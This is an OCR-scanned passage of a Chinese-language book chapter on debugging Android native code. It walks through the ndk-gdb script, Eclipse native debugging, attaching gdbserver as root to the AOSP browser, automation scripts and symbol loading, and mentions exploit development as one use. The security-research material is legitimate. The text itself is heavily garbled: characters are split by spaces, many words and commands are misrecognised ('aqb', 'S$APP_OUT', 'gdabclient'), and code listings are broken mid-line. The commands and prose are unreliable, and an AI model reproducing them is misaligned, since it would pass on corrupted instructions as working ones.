在 脚本 的 最 后 40 行 左右 。 以 下 片段 展示 了 Linux x86_ 64 平台 Android NDK r9 的 部 分 代码 : 

708 # Get the app_server binary from the device 


709 APP_PROCESS=S$APP_OUT/app_process 
710 run adb cmd pull /system/bin/app_process ‘native path $APP_PROCESS. 
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711 log "Pulled app_process from device/emulator." 
712 
713 run adb_cmd pull /system/bin/linker ‘native path S$APP_OUT/linker. 


714 log "Pulled linker from device/emulator." 

15. 

716 run adb_ cmd pull /system/lib/libc.so ‘native path S$APP_OUT/libc.so. 
717 log "Pulled libc.so from device/emulator." 


位 于 第 710、713 和 716 行 的 命令 从 设备 上 下 载 了 三 个 关键 文件 : app_process linker 和 libc.so 
二 进 制 文件 。 这 些 文件 包含 关键 信息 和 一 些 有 限 的 符号 , 虽然 没有 包含 足够 的 信息 来 支持 源 代码 
级 的 调试 , 但 是 7.6.5 节 会 进行 介绍 。 如 果 没 有 这 些 下 载 的 文件 ，GDB 客户 端 调试 目标 进程 时 将 
会 遇 到 麻烦 ， 尤 其 是 处 理 线程 时 。 得 到 这 些 文件 后 ， 该 脚本 会 尝试 启动 JDB 以 解决 前 面 的 “等 
竺 调试 器 ”问题 。 最 后 ， 该 脚本 启动 GDB 客户 端 ， 如 下 所 示 : 
































730 
3 
732 
733 
734 
3 


# Now launc 
# 
GDBCLIENT=$ 
GDBSETUP=SA 
cp -f SGDBS 
#uncomment 


h the appropriate gdb client with the right init commands 


{TOOLCHAIN_PREFIX}gdb 

PP_OUT/gdb.setup 

ETUP_INIT SGDBSETUP 

the following to debug the remote connection only 


736 
737 
738 
739 
740 
741 
742 


#echo 
echo 
echo 
二 4 下 


"set debug remote 1" >> SGDBSETUP 
"file ‘native path $APP_ PROCESS " 
"target remote :S$DEBUG_ PORT" 
-nNn "SOPTION_EXEC" ] ; then 
cat SOPTION_EXEC >> SGDBSETUP 


>> SGDBSETUP 
>> SGDBSETUP 





£i 
SGDBCLIENT -x ‘native path S$GDBSETUP、 


大 部 分 语句 (第 733 行 至 第 741 行 ) 是 在 生成 一 个 GDB 客户 端 使 用 的 脚本 。 首 先 复制 一 份 
在 调试 生成 过 程 中 放 入 应 用 的 gdb.setup 文件 ， 然 后 出 现 了 一 些 注释 。 取 消 注释 这 些 行 可 以 支持 
调试 GDB 自身 的 协议 通信 。 该 级 别 的 调试 有 助 于 跟踪 gdbserver 不 稳定 的 问题 , 但 对 调试 自己 的 
代码 没有 帮助 。 接 下 来 的 两 行 告知 GDB 客户 端 在 哪里 找到 调试 二 进 制 文件 以 及 如 何 连接 到 等 待 
的 GDB 服务 器 。 在 第 739 行 至 第 741 行 ,ndk-gdb 附加 了 一 个 自 定 义 的 脚本 ,可 以 通过 -x 或 --exec 
标识 指定 。 此 选项 对 自动 产生 断 点 或 执行 更 复杂 的 脚本 非常 有 帮助 。 关于 此 话题 的 更 多 细节 将 在 
7.6.4 节 中 讨论 。 最 后 , 执行 GDB 客户 端 和 新 生成 的 GDB 脚本 。 了 解 ndk-gdb 脚本 如 何 工作 为 高 
级 脚本 调试 铺 平 了 道路 ， 详 见 7.6.4 节 。 



































7.6.2 ”使 用 Eclipse 进行 调试 


2012 年 6 月 , ADT 搬 件 的 20 版 本 发 布 ,增加 了 对 原生 代码 生成 和 调试 的 支持 ， 因 此 能 够 使 
用 Eclipse IDE 来 调试 C/C++ 代码 。 不 过 只 安装 这 个 新 版 ADT 仍 不 足以 进行 原生 代码 调试 ， 还 需 
要 一 些 额外 的 步 又。 本 节 会 进行 详细 介绍 ， 带 大 家 实现 原生 代码 的 源 代码 级 调试 。 

1. 添加 原生 代码 支持 

打开 项 目 后 ， 实 现 原生 代码 调试 的 第 一 步 是 告知 ADT 安装 NDK 的 位 置 。 在 Eclipse 中 ， 从 
窗 体 菜单 中 选择 Preferences， 展 开 Android 项 并 选择 NDK， 输 入 或 浏览 NDK 的 安装 路 径 ， 点 击 
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Apply 后 再 点 击 OK。 

通 带 来 说 ， 有 必要 向 项 目 中 添加 原生 代码 。 幸 运 的 是 ,本章 随 书 资料 中 的 源 代码 已 经 包含 了 
所 需要 的 原生 代码 。 如 果 遇 到 问题 ， 或 者 想 给 一 个 新 的 Android 应 用 工程 添加 原生 代码 ， 步 又 如 
下 。 否则 , 可 以 跳 过 下 一 段 。 要 给 工程 添加 原生 支持 ,首先 右 击 Package Explorer 窗口 中 的 项 目 ， 
并 选择 Android Tools> Add Native Support 菜单 项 。 在 显示 的 对 话 框 中 , 输入 JNI 名 称 。 以 我 们 的 
演示 应 用 为 例 , 输入 hello-jni, 点 击 OK。 此 时 , ADT 创建 了 jni 目录 并 向 工程 中 添加 了 一 个 名 为 
hello-jni.cpp 的 文件 。 下 一 步 是 在 启动 调试 器 前 调整 一 些 配置 。 

2. 准备 调试 原生 代码 

正如 之 前 使 用 ndk-gdb 时 所 做 的 ， 需 要 告知 Android 生成 系统 要 生成 的 应 用 必须 支持 调试 。 
在 Eclipse 中 实现 以 上 功能 只 需要 一 些 简 单 的 步骤 。 首 先 ， 选 择 Project>Properties。 展 开 C/C++ 
生成 选项 并 选择 Environment， 点 击 Add 按钮 ,变量 名 输入 NDK_DEBUG, 值 输入 1。 点 击 OK 后 ， 
就 可 以 开始 调试 了 。 为 了 确保 新 的 环境 变量 生效 ， 选 择 Project>Build All。Console 窗口 会 显示 
与 直接 使 用 ndk-gdb 时 相似 的 输出 结果 。 尤 其 要 注意 以 gdb 开头 的 行 。 

3. 实践 所 见 

因为 目标 是 调试 代码 ， 所 以 要 确保 一 切 运 行 正常 。 最 简单 的 方法 是 验证 是 否 可 以 在 Eclipse 
中 交互 式 地 设置 断 点 。 首 先 ， 在 JNI 函数 中 想 要 中 断 的 地 方 设置 断 点 。 对 于 演示 应 用 ， 调 用 
_ android_log_print 方法 的 那 行 是 理想 的 位 置 。 设 置 断 点 后 ， 点 击 Debug As 工具 栏 按钮 启 
动 调试 会 话 。 如 果 该 应 用 以 前 从 没 被 调试 过 ， 就 会 看 到 询问 采用 何 种 调试 方式 的 对 话 框 。 对 于 调 
试 原生 代码 ， 选 择 Android Native Application 并 点 击 OK。ADT 启动 原生 调试 器 ， 附 加 到 远程 进 
程 上 并 继续 执行 。 幸 运 的 话 ， 会 看 到 设置 的 断 点 ， 如 图 7-8 所 示 。 
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图 7-8 Eclipse 停 在 一 个 原生 代码 断 点 上 
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由 于 另 一 种 “等 待 调试 器 ”问题 , 成 功 调试 要 靠 运 气 。 这 次 不 是 一 直 等 待 , 而 是 很 快 被 驶 回 ， 
这 将 导致 在 第 一 时 间 错 过 断 点 。 值 得 庆幸 的 是 ， 调 整 屏 幕 的 方向 可 以 再 次 触发 oncreate 事件 ， 
重新 执行 原生 代码 ， 并 停 在 你 的 断 点 上 。 


7.6.3 使 用 AOSP 进行 调试 


AOSP 资料 库 几 乎 包含 了 启动 和 运行 所 需要 的 一 切 。ADB 二 进 制 文件 是 唯一 不 包含 在 内 的 ， 
它 通常 来 自 SDK Platform Tools。 由 于 AOSP 直接 支持 Nexus 设备 ， 使 用 Nexus 设备 调试 原生 代 
人 码 的 体验 是 最 好 的 。 事 实 上， 本 章 几 乎 所 有 的 示例 都 是 使 用 Nexus 设备 开发 的 。 另 外 ，Nexus 设 
备 中 的 二 进 制 文件 都 是 使 用 userdepug 变量 编译 生成 的 ， 这 是 因为 可 以 在 可 执行 与 可 链接 格式 
( ELF ) 二 进 制 文件 中 找到 .gnu_qebuglink 段 。 使 用 userdebug 生成 变量 时 ,设备 上 所 有 的 
原生 代码 二 进 制 文件 都 带 有 部 分 符号 .本 节 会 展示 调试 AOSP 仓库 中 Android 浏览 器 的 整个 过 程 ， 
主要 分 为 三 个 基本 阶段 : 配置 环境 ， 附 加 至 浏览 器 进程 ， 以 及 连接 调试 器 客户 端 。 


















































注意 ”由 于 Android 的 安全 模型 ， 调 试 原生 代码 编写 的 系统 进程 需要 root 访问 权限 。 可 以 通过 
使 用 eng 配 置 生 成 ， 或 者 使 用 第 三 章 提 供 的 信息 来 获取 root 访问 权限 。 


1. 配置 环境 


在 将 GDB 附加 至 目标 进程 之 前 要 配置 好 环境 , 通过 一些 AOSP 中 的 简单 命令 就 能 完成 。 下 面 








在 搭载 Android 4.3 (JWR66Y ) 的 GSM Galaxy Nexus 设备 上 配置 环境 ， 来 调试 用 C/C++ 编写 的 
程序 : 


dev:~/android/source $ mkdir -p device/samsung S&& cd S_ 
dev:~/android/source/device/samsung $ git clone \ 
/aosp-mirror/device/samsung/maguro.git 

Cloning into 'maguro'... 

done. 

dev:~/android/source/device/samsung $ git clone \ 
/aosp-mirror/device/samsung/tuna.git 

Cloning into 'tuna'... 

done. 

dev:~/android/source/device/samsung $ cd ../.. 
dev:~/android/source $ . build/envsetup.sh 
including device/samsung/maguro/vendorsetup.sh 
including sdk/bash_ completion/adb.bash 
dev:~/android/source $ lunch full maguro-userdebug 





PLATFORM_VERSION_CODENAME=REL 
PLATFORM_VERSION=4.3 
TARGET_PRODUCT=full_maguro 
TARGET_BUILD_VARIANT=userdebug 
TARGET_BUILD_TYPE=release 
TARGET_BUILD_APPS= 
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TARGET_ARCH=arm 

TARGET_ARCH_VARIANT=armv7-a-neon 

TARGET_CPU_VARIANT=cortex-a9 

HOST_ARCH=x86 

HOST _OS=1inuX 
HOST_OS_EXTRA=Linux-3.2.0-52-generic-x86_64-with-Ubuntu-12.04-precise 
HOST_BUILD_TYPE=release 

BUILD_ID=JWR66Y 

OUT_DIR=out 


开头 的 几 个 命令 用 于 获取 Galaxy Nexus 上 特定 于 设备 的 目录 ， 这 些 目录 是 配置 环境 需要 的 。 
device/samsung/maguro 仓库 是 GSM Galaxy Nexus 设备 专 有 的 , device/samsung/tuna 仓库 则 包含 了 
与 CDMA/LTE Galaxy Nexus 共享 的 项 目 。 最 后 ， 通 过 下 载 build/envsetup.sh 脚本 并 执行 lunch 
命令 来 配置 和 初始 化 AOSP 生成 环境 。 
配置 好 AOSP 环境 ， 下 一 步 是 配置 设备 。 因 为 产品 镜像 (user 和 userdebug 生成 ) 不 包含 
GDB 服务 器 二 进 制 文件 ， 需 要 上 传 。 幸 运 的 是 ，AOSP 的 prebuilts 目录 恰好 包含 所 需 的 gdbserver 
二 进 制 文件 。 以 下 片段 展示 了 实现 步骤 ， 包 括 gdbserver 二 进 制 文件 在 AOSP 资料 库 中 的 路 径 。 


dev:~/android/source $ adb push prebuilts/misc/android-arm/gdbserver/ 
gdbserver \ 

/data/local/tmp 

1393 KB/s (186112 bytes in 0.130s) 

dev:~/android/source $ adb shell chmod 755 /data/local/tmp/gdbserver 
dev:~/android/source $ 


现在 gdbserver 已 经 在 设备 上 了 ， 马 上 就 可 以 附加 至 浏览 器 进程 。 

演示 过 程 中 ， 使 用 标准 TCP/IP 连接 将 GDB 客户 端 连 接 到 GDB 服务 器 上 。 为 了 完成 连接 ， 
必须 采用 两 种 方法 中 的 一 种 。 如 果 设 备 和 调试 主机 在 同一 个 Wi-Fi 网 络 里 , 可 以 使 用 其 IP 地 址 而 
不 是 后 面 使 用 的 127.0.0.1。 但 是 通过 Wi-Fi 远程 调试 可 能 有 速度 慢 、 信 号 差 、 省 电 功 能 或 其 他 问 
题 ， 从 而 导致 一 些 麻烦 。 为 了 避免 这 些 问题 ， 建 议 通过 USB 使 用 ADB 进行 调试 。 但 是 在 一 些 特 
殊 情 况 下 ， 例 如 调试 USB 进程 时 ， 可 能 就 没有 选择 的 余地 了 。 如 果 使 用 USB ， 就 需要 使 用 ADB 
的 端口 转发 功能 为 GDB 客户 端 打开 一 个 管道 。 这 个 实现 是 比较 简单 的 ， 如 下 所 示 : 

dev:~/android/source $ aqb forward tcp:31337 tcp:31337 

完成 这 一 步 ， 最 轻 量 级 的 调试 环境 就 配置 好 了 。 

2. 附加 至 浏览 器 

下 一 步 , 使 用 GDB 服务 器 执行 目标 程序 ， 或 考 附 加 至 现 有 进程 。 不 带 参 数 运行 gdbserver 
二 进 制 文件 可 以 查看 所 需 的 命令 行 参数 。 

dev:~/android/source $ adb shell /data/local/tmp/gdbserver 

Usage: gdbserver [OPTIONS] COMM PROG [ARGS ...] 


gdbserver [OPTIONS] --attach COMM PID 
gdbserver [OPTIONS] --multi COMM 






















































































COMM may either be a tty device (for serial debugging), or 
HOST:PORT to listen for a TCP connection. 
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Options: 
--debug Enable general debugging output. 
--remote-debug Enable remote protocol debugging output. 
--version Display version information and exit. 
--wrapper WRAPPER -- Run WRAPPER to start new programs. 





上 面 的 输出 结果 显示 gdbserver 支持 三 种 不 同 的 模式 ， 三 种 模式 都 需要 coMM 参数 。 上 面 已 

介绍 了 该 参数 的 用 法 , 这 里 使 用 之 前 通过 ADB 转发 的 端口 tcp:31337 作为 这 个 参数 。 第 一 种 模 
有 行程 序 ， 人 允许 指定 目标 程序 并 传递 期 望 的 参数 。 第 二 种 模式 允许 附加 至 现 有 进程 ,使 用 
PID 参数 指定 进程 ID 。 第 三 种 模式 是 多 进程 模式 。 在 此 模式 中 ，gdbserver 依然 会 监听 客户 端的 
连接 ， 但 不 会 自动 执行 程序 或 附加 进程 ， 而 是 按照 客户 端的 命令 来 执行 。 

这 里 的 演示 使 用 附加 模式 ,因为 GDB 客户 端 或 服务 器 偶尔 发 生 骨 溃 时 在 该 模式 下 更 容易 复原 。 

选 定 操作 模式 后 ,就 可 以 准备 附加 至 浏览 器 进程 了 , 但 是 这 需要 浏览 器 处 于 运行 状态 。 设备 
启动 时 浏览 咒 不 会 自动 运行 ， 需要 通过 以 下 命令 来 启动 它 : 


shell@android:/ $ am start -a android.intent.action.VIEW \ 
-d about:blank com.google.android.browser 
Starting: Intent { act=android.intent.action.VIEW dat=about:blank } 


可 以 使 用 带 有 start 参数 的 am 命令 ,通过 发 送 intent 打 开 浏 览 器 并 导航 至 空白 页 about:blank 
的 URI。 另 外 ， 为 了 避免 不 小 心 打 开 已 安装 的 其 他 浏览 器 ， 需 要 指定 浏览 器 的 包 为 com.google. 
android.browser。 当然 ,手动 打开 浏览 器 也 是 可 行 的 。 

J 运行 浏览 器 的 最 后 一 步 是 获取 浏览 器 进程 ID 号 ， 可 以 使 用 BusyBox 工具 或 者 ps 






























































2051 shell@android:/ $ ps | /data/local/tmp/busybox grep browser 
u0_a4 2051 129 522012 59224 ffffffff 00000000 S 
com.google.android.browser 

shell@android:/ $ /data/local/tmp/busybox pidof \ 
com.google.android.browser 








2051 
现在 , 使 用 J 动 gdbserver。 首先 退出 ADB shell 并 返回 主机 shell, 使 用 aqb shell 
命令 启动 gdbserver， 让 它 附加 到 浏览 器 进程 ID。 





dev:~/android/source $ adb shell su -c /data/local/tmp/gdbserver \ 
-~-attach tcp:31337 2225 

Attached; pid = 2225 

Listening on port 31337 

六 

[1]+ Stopped adb shell su -c /data/local/tmp/gdbserver 
-=-attach top:31337 .2225 

dev:~/android/source $ bg 

[1]+ adb shell su -c /data/local/tmp/gdbserver --attach tcp:31337 2225 & 


gdbserver 启动 后 ， 使 用 Control-Z 组 合 键 来 挂 起 该 进程 。 然 后 使 用 bash 的 pg 命令 将 adb 进 
程 转 到 后 台 运 行 。 还 可 以 从 一 开始 就 使 用 bash 的 & 控 制 操作 符 ( 与 bg 命令 类 似 ) 让 ADB 后 台 运 
行 。 这 样 就 可 以 释放 终端 ， 从 而 附加 GDB 客户 端 。 
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3. 连接 GDB 客户 端 

最 后 一 步 是 将 GDB 客户 端 连接 至 正在 设备 上 监听 的 GDB 服务 器 。AOSP 包含 一 个 全 功能 的 
GDB 客户 端 。 较 新 版 本 的 AOSP 甚至 在 GDB 客户 端 中 包含 了 对 Python 的 支持 。 启动 并 连接 客户 
端 ， 如 下 所 示 : 


dev:~/android/source $ arm-eabi-gdb -qa 
(gdb) target remote :31337 

Remote debugging using :31337 

Remote debugging from host 127.0.0.1 
Ox4011gd408 in ?? () 

(gdb) back 

#0 0x4011d408 in ?? () 

#1 Ox400dlfcc in ?? () 

#2 0x400dlfcc in ?? () 

Backtrace stopped: previous frame identical to this frame (corrupt 
stack?) 

(gdb) 


运行 客户 端 后 ， 使 用 target remote 命令 将 其 连接 至 等 待 的 GDB 服务器。 该 命令 的 参数 
根据 配置 环境 时 使 用 ADB 转发 的 端口 而 定 。 如 果 PP 地址 省 略 ， 那 么 GDB 客户 端 默认 使 用 本 地 
回环 接口 。 现 在 就 可 以 完全 访问 目标 进程 了 ， 可 以 设置 断 点 ， 查 看 寄存 器 ， 查 看 内 存 ， 等 等 。 

4. 使 用 gdabclient 命令 

AOSP 编译 环境 中 定义 了 一 个 内 置 的 bash 命令 gdbclient, 可 以 自动 完成 上 述 大 部 分 过 程 。 
它 可 以 进行 端口 转发 ,启动 GDB 服务 器 ， 自 动 连接 GDB 客户 端 。 要 使 用 这 个 命令 ，gdbserver 
必须 在 设备 上 ,并且 在 ADB 用 户 的 执行 路 径 中 ， 因 此 也 许 只 适用 于 eng 编译 生成 的 设备 。 可 以 
通过 以 下 shell 命 令 来 查看 该 内 置 命令 的 全 部 定义 : 

dev:~/android/source $ declare -f gdbclient 

gdbclient () 


{ 
| 


简洁 起 见 ， 不 再 列举 完整 的 命令 ， 建 议 读者 使 用 自己 的 编译 环境 跟踪 该 命令 。 

gabclient 首先 查询 Android 编译 系统 , 以 确定 环境 初始 化 过 程 中 定义 的 详细 信息 , 包括 路 
径 和 变量 ( 如 目标 设备 架构 )。 然 后 ，gdqbclient 尝试 确定 它 是 如 何 被 调用 的 。 可 以 使 用 0、1、 
2 或 3 个 参数 启动 gqbclient。 第 一 个 参数 是 在 /system/bin 目录 中 一 个 二 进 制 文 件 的 名 字 。 第 二 
个 参数 是 转发 的 端口 号 ， 以 冒号 字符 作为 前 缀 。 前 两 个 参数 会 分 别 覆 盖 app_process 和 :5039 
这 两 个 默认 参数 。 

第 三 个 参数 用 于 指定 其 附加 的 进程 DD 号 或 命令 名 。 如 果 它 是 一 个 命令 名 ,gdbclient 会 党 
试 在 目标 设备 上 使 用 内 置 的 pia 命令 来 解析 其 进程 ID 号 。 如 果 该 参数 被 成 功 处 理 , gdbclient 
会 使 用 ADB 来 自动 转发 设备 端口 并 将 gdbserver 附加 至 目标 进程 上 ; 如 果 被 省 略 ,， 则 由 用 户 负 责 
启动 GDB 服务 器 。 

接 下 来 ， 与 ndk-gdb 脚本 类 似 ，gdapbclient 会 产生 一 个 GDB 脚本 。 它 会 设置 一 些 符 号 相关 
的 GDB 变量 并 让 GDB 客户 端 连 接 等 待 的 GDB 服务 器 。gdbclient 与 ndk-gdb 脚本 有 两 点 主要 
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区 别 。 其 一 ，ggbclient 依赖 于 来 自 自 定义 生成 版 本 的 符号 ， 而 不 是 从 目标 设备 上 获取 的 二 进 
制 文件 。 如 果 没 有 自 定 义 的 生成 版 本 ，gabclient 不 可 能 正常 运行 。 其 二 ，gqpbclient 不 允许 
用 户 指定 额外 的 命令 或 脚本 供 GDB 客户 端 执行 。 内 置 gdabclient 的 不 灵活 性 和 假设 条 件 使 其 
难以 使 用 ， 尤 其 是 在 高 级 调试 场景 下 。 虽 然 通 过 重 定义 内 置 gdbwrapper 或 创建 自 定 义 .gdbinit 文 
件 能 解决 一 些 问题 ， 但 是 这 些 选 项 还 未 经 深入 探究 ， 在 此 留 给 读者 作为 练习 。 


7.6.4 提升 自动 化 程度 


调试 像 Android 浏览 器 这 样 的 应 用 可 能 非常 耗 时 。 如 果 想 开发 利用 程序 , 进行 逆向 工程 分 析 ， 
或 者 深入 研究 一 个 问题 ， 擎 握 一 些小 技巧 会 有 很 大 的 帮助 。 自 动 化 启动 GDB 服务 器 和 客户 端的 
过 程 有 助 于 简化 调试 。 本 节 介 绍 的 方法 可 以 将 一 些 特定 的 项 目 操作 自动 化 , 我 们 会 演示 如 何 把 这 
些 方法 应 用 在 调试 Android 浏览 器 中 。 你 可 能 会 发 现 这 些 方法 与 第 6 章 中 采用 的 方法 非常 相似 ， 
但 是 此 处 的 目的 是 提高 研究 人 员 的 效率 , 而 非 完 全 自动 化 测试 。 通过 自动 实现 尽 可 能 多 的 普通 任 
务 ， 能 够 给 研究 人 员 更 多 发 挥 技 能 的 空间 。 

1. 自动 化 设备 上 的 任务 

在 许多 场景 下 , 例如 开发 利用 程序 时 , 开启 多 个 调试 会 话 是 很 有 必要 的 。 不 过 在 附加 模式 下 ， 
gdbserver 在 调试 会 话 结束 后 就 退出 了 。 在 这 些 情 况 下 ， 使 用 一 些小 的 shell 脚本 来 自动 实现 多 次 
附加 过 程 是 非常 有 帮助 的 。 

第 一 步 是 在 主机 上 创建 以 下 简短 的 shell 脚本 并 执行 。 


dev:~/android/source $ cat > debugging.sh 

















































































































#!/bin/sh 
while true; do 
sleep 4 
adb shell 'su -c /data/local/tmp/attach.sh' >> adb.l1log 2>&1 
done 
"1 


dev:~/android/source $ chmod 755 debugging.sh 
dev:~/android/source $ 


在 主机 后 台 运 行 此 脚本 可 以 保证 设备 上 的 gdbserver 实例 退出 4 秒 后 重新 启动 。 这 里 的 时 间 
延迟 是 为 了 让 目标 进程 有 足够 的 时 间 从 系统 中 清除 。 虽 然 这 个 脚本 需要 设备 自身 shell 脚本 的 支 
持 ， 但 是 在 主机 上 运行 此 脚本 有 助 于 防止 gdbserver 端点 不 小 心 暴露 给 不 可 信 的 网 络 。 

下 一 步 ， 在 设备 上 创建 shell 脚本 /data/local/tmp/attach.sh 并 运行 。 


shell@maguro:/data/local/tmp $ cat > attach.sh 
#!/system/bin/sh 











# start the browser 
am start -a android.intent.action.VIEW -d about:blank \ 
com.google.android.browser 


# wait for it to start 
sleep 2 
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# attach gdbserver 

cd /data/local/tmp 

PID=` ./busybox pidof com.google.android.browser. # requires busybox 
./gdbserver --attach tcp:31337 SPID 

A 

shell@maguro:/data/local/tmp $ chmod 755 attach.sh 
shell@maguro:/data/local/tmp $ 


该 脚本 实现 了 局 动 浏览 器 ， 获 取 其 进程 ID 号， 并 将 GDB 服务 需 附 加 至 该 进程 的 整个 过 程 。 
有 了 这 两 个 脚本 ， 只 需 在 主机 后 台 执 行 第 一 个 脚本 即 可 。 


dev:~/android/source $ ./debugging.sh & 
[1] 28994 


使 用 这 两 个 小 脚本 可 以 消除 不 必要 的 窗口 切换 来 重启 gdbserver。 这 使 得 研究 人 员 可 以 专注 
于 手头 上 的 工作 ， 专 心 使 用 GDB 客户 端 来 调试 目标 进程 。 

2. 自动 化 GDB 客户 端 

自动 化 GDB 客户 端 有 助 于 进一步 简化 分 析 过 程 。 现 在 的 所 有 GDB 客户 端 都 支持 GDB 自 定 
义 脚本 语言 ， 较 新 版 本 AOSP 的 GDB 客户 端 也 包含 了 对 Python 脚本 的 支持 。 本 节 使 用 GDB 脚 
本 自动 实现 连接 gdbserver 的 过 程 。 

如 果 只 附加 至 远程 GDB 服务 器 , 使 用 GDB 客户 端的 -ex 选项 就 足够 了 。 该 选项 可 以 让 研究 
人 员 指 定 一 个 命令 在 GDB 客户 端 启 动 后 运行 。 以 下 片段 展示 了 如 何 使 用 此 选项 通过 target 
remote 命令 附加 至 等 待 中 的 GDB 服务 器 : 


dev:~/android/source $ arm-eabi-gdb -q -ex "target remote :31337" 
Remote debugging using :31337 

Remote debugging from host 127.0.0.1 

0x401b5ee4 in ?? () 

(gdpb) 


在 后 续 小 节 中 可 以 看 到 ， 有 时 候 有 必要 自动 执行 多 个 GDB 客户 端 命令 。 虽 然 在 一 个 命令 中 
可 以 多 次 使 用 -ex 选项 , 但 还 有 男 一 种 方法 更 加 合适 : 除了 -ex 选项 ，GDB 客户 端 也 支持 -x 选 
项 。 使 用 此 选项 , 研究 人 员 可 以 将 其 选择 的 多 个 命令 放 入 文件 中 并 将 文件 名 作为 -x 选项 的 参数 。 
7.6.1 节 中 使 用 过 这 种 功能 。GDB 也 会 默认 从 当前 目录 的 .gdbinit 文件 中 读 取 命令 并 执行 。 将 脚本 
命令 放 人 该 文件 后 ， 不 再 需要 为 GDB 指定 其 他 选项 。 

不 管 使 用 哪 种 方法 , 编写 GDB 脚本 对 自动 化 调试 都 是 非常 有 帮助 的 。 使 用 GDB 脚本 可 以 实 
现 复杂 的 特定 操作 ， 例 如 自 定义 跟踪 和 相互 依赖 的 断 点 。 更 多 高 级 脚本 将 在 7.9 节 中 介绍 。 


5 使 用 符号 进行 调试 

符号 是 调试 原生 代码 时 最 有 用 的 信息 , 包含 了 人 类 可 以 理解 的 信息 , 同时 也 对 应 了 二 进 制 文 
件 中 的 代码 位 置 。ARM 二 进 制 文件 符号 也 被 调试 器 用 来 判断 处 理 器 当前 的 执行 模式 。 无 符号 调 
试 可 能 是 一 件 非 常 痛苦 的 事情 ， 会 在 后 面 的 7.6.6 节 进 一 步 介 绍 。 不 论 符号 已 经 存在 还 是 需要 编 
译 才 能 得 到 ， 都 应 当 想 办 法 使 用 符号 。 本 节 会 讨论 关于 符号 的 细节 ， 并 就 如 何在 Android 上 更 好 
地 利用 符号 调试 原生 代码 给 予 指导 。 
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Android 设备 上 的 二 进 制 文件 包含 不 同 级 别 的 符号 信息 , 这 因 设 备 和 二 进 制 文件 的 不 同 而 异 。 
移动 运营 商 出 售 的 产品 设备 在 其 二 进 制 文件 中 往往 不 包含 任何 符号 。 在 包括 Nexus 设备 在 内 的 部 
分 设备 中 ， 有 很 多 二 进 制 文件 只 包含 部 分 符号 ， 这 是 使 用 userdebug 或 eng 编译 Android 版 本 
的 典型 做 法 。 部 分 符号 提供 了 一 些 可 以 人 工 识别 的 信息 (如 函数 名 )， 而 不 提供 文件 或 行 号 信息 。 
带 有 完全 符号 的 二 进 制 文件 则 会 包含 大 量 信息 , 对 调试 代码 很 有 帮助 。 完 全 的 符号 包含 文件 和 行 
号 信息 ， 可 以 用 来 实现 源 代码 级 的 调试 。 简 而 言 之 ， 在 Android 上 调试 原生 代码 时 遇 到 的 困难 与 
已 有 的 符号 级 别 成 反比 。 

1. 获取 符号 

一 些 软件 行业 的 供应 商 ( 例如 Microsoft 和 Mozilla ) 通过 符号 服务 器 公开 提供 符号 ， 但 是 
Android 环境 下 没有 供应 商 为 其 编译 版 本 提供 符号 。 事实 上 , Android 编译 版 本 的 符号 往往 需要 通 
过 源 代码 来 生成 ， 这 就 需要 非常 强大 的 编译 机 器 。 除 了 泄露 出 来 的 少量 Android 工程 编译 版 本 ， 
以 及 Nexus 设备 上 现 有 的 部 分 符号 外 ， 自 定义 编译 是 获取 符号 的 唯一 途径 。 

幸运 的 是 , 可 以 为 AOSP 支持 的 设备 编译 整个 镜像 。 在 编译 过 程 中 , 包含 符号 信息 的 文件 会 
与 发 布 版 本 文件 同时 生成 。 由 于 包含 符号 的 二 进 制 文件 非常 大 ， 如 果 将 其 刷 入 设备 , 会 很 快 耗 尽 
系统 的 可 用 空间 。 举 个 例子 ，WebKit 带 符 号 的 库 文件 libwebcore.so 就 超过 了 450 兆 字 节 。 因 此 
在 远程 调试 时 ， 可 以 将 这 些 带 有 符号 的 大 文件 与 运行 在 设备 上 的 无 符号 二 进 制 文件 配合 使 用 。 

除了 编译 生成 一 个 完整 的 设备 镜像 ,也 可 以 编译 单个 组 件 ,采用 这 种 方式 可 以 减少 编译 时 间 ， 
使 调试 过 程 更 加 高 效 。 使 用 make 命令 或 者 编译 系统 内 置 的 mm 命令 ， 只 需 编译 需要 的 组 件 ， 相 
应 的 依赖 就 会 被 自动 编译 。 在 AOSP 的 顶层 目录 下 ， 指 定 第 一 个 参数 为 所 需 的 组 件 并 执行 make 
或 mm 命令 即 可 。 可 以 使 用 以 下 命令 查找 组 件 名 列表 : 


dev:~/android/source $ find . -name Android.mk -print -exec grep \ 
人 ^'LOCAL MODULE ' {} \; 

























































































































































































































































































[号 | 
./external/webkit/Android.mk 
LOCAL MODULE := libwebcore 
[easel 


上 面 的 命令 会 输出 每 一 个 Android.mk 文件 的 路 径 及 其 定义 的 模块 。 正 如 在 以 上 片段 中 看 到 
的 ，external/webkit/Android.mk 文件 定义 了 1ibwebcore 模块 。 因 此 ， 执 行 mm libwebcore 命令 
会 生成 所 需要 的 组 件 。 编 译 系统 将 包含 符号 的 文件 写 人 out/target/product/maguro/symbols 目录 下 
的 systenylib/libwebcore.so 中 。 路 径 中 的 maguro 部 分 是 针对 目标 设备 的 ， 如 果 要 为 不 同 的 设备 编 
译 ， 应 该 使 用 相应 的 产品 名 称 ， 例 如 Nexus 4 的 名 称 为 mako。 

2. 使 用 符号 

通过 以 上 方法 或 其 他 方式 获取 符号 后 , 就 要 开始 使 用 了 。 不 论 是 使 用 gdbclient、ndk-gdb 
脚本 ， 还 是 直接 使 用 GDB， 都 需要 加 载 刚 获 得 的 符号 来 提升 调试 体验 ， 虽然 这 些 工 具 的 使 用 过 
程 稍 有 差异 ， 但 是 GDB 客户 端 最 终 都 需要 加 载 并 显示 这 些 符号 。 这 里 将 介绍 每 种 方法 如 何 使 用 
符号 ， 并 进一步 讨论 提高 符号 加 载 速度 的 方法 。 

AOSP 提供 的 内 置 ggqbclient 会 自动 使 用 编译 生成 的 符号 。gdbclient 通过 Android 编译 
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系统 获取 生成 符号 的 路 径 , 并 指示 GDB 客户 端 在 其 中 查找 。 不 幸 的 是 ，gdbclient 会 使 用 默认 
生成 的 几乎 所 有 模块 的 符号 。 由 于 带 符 号 的 模块 会 占用 较 大 空间 ， 所 以 这 个 过 程 可 能 非常 慢 。 其 
实在 大 多 数 情 况 下 ， 完 全 没有 必要 为 所 有 模块 加 载 符 号 。 

单独 使 用 NDK 调试 时 ,ndk-gdb 脚本 也 支持 自动 加 载 符号 。 与 内 置 gabclient 不 同 ,ndk-gdb 
脚本 直接 从 目标 设备 上 下 载 app_process 、linker 和 libc.so 文件 。 前 面 提 到 ， 这 些 二 进 制 文件 只 包 
